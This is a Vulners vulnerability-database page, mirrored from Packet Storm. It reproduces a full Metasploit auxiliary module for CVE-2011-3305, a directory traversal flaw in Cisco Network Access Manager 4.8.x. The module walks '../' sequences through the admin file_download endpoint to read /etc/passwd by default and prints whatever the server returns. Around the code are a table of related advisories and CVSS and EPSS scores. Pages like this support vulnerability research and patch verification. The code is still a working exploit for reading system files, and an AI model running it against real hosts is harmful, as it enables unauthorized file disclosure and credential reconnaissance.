Vulners
Lucene search
Cisco Network Access Manager Directory Traversal
🗓️ 01 Sep 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 204 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2011-3305 | 29 May 201815:50 | – | circl |
 | Directory Traversal Vulnerability in Cisco Network Admission Control Manager | 5 Oct 201116:00 | – | cisco |
 | CVE-2011-3305 | 6 Oct 201110:00 | – | cve |
 | CVE-2011-3305 | 6 Oct 201110:00 | – | cvelist |
 | Cisco Network Access Manager Directory Traversal Vulnerability | 18 Oct 201104:40 | – | metasploit |
 | CVE-2011-3305 | 6 Oct 201110:55 | – | nvd |
 | Directory traversal | 6 Oct 201110:55 | – | prion |
 | Cisco Security Advisory: Directory Traversal Vulnerability in Cisco Network Admission Control Manager | 10 Oct 201100:00 | – | securityvulns |
| Cisco Network Admission Control Manager directory traversal | 10 Oct 201100:00 | – | securityvulns |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
'Description' => %q{
This module tests whether a directory traversal vulnerability is present
in versions of Cisco Network Access Manager 4.8.x You may wish to change
FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
},
'References' =>
[
[ 'CVE', '2011-3305' ],
[ 'OSVDB', '76080']
],
'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
'License' => MSF_LICENSE,
'DefaultOptions' => {
'SSL' => true
}
)
register_options(
[
Opt::RPORT(443),
OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
])
end
def run_host(ip)
traversal = '../../'
part1= '/admin/file_download?tag='
part2 = '&fileType=snapshot'
begin
print_status("Attempting to connect to #{rhost}:#{rport}")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/admin',
}, 25)
if (res)
1.upto(datastore['MAXDIRS']) do |level|
try = traversal * level
traversalstring = part1 + try + datastore['FILE'] + part2
res = send_request_raw(
{
'method' => 'GET',
'uri' => traversalstring,
}, 25)
if (res and res.code == 200)
print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
break
elsif (res and res.code)
print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 27.8
EPSS0.42002